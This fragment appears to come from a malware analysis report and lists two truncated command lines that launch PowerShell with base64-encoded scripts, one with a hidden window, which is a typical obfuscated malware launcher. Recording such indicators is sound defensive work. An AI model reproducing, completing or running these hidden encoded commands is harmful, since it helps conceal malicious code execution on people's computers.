Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAHQAdwB5AGQAaABhAGkAdgBjAG4AbgA9ACcARQB6AHAAdwBxAGgAcwBpACcAOwAkAFkAYgBxAHUAYwBiAGcAYwBxAHoAZwAgAD...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABLAHQAdwB5AGQAaABhAGkAdgBjAG4AbgA9ACcARQB6AHAAdwBxAGgAcwBpACcAOwAkAFkAYgBxAHUAYwBiAGcAYwBxAHoAZwAgAD...' (with hidden window)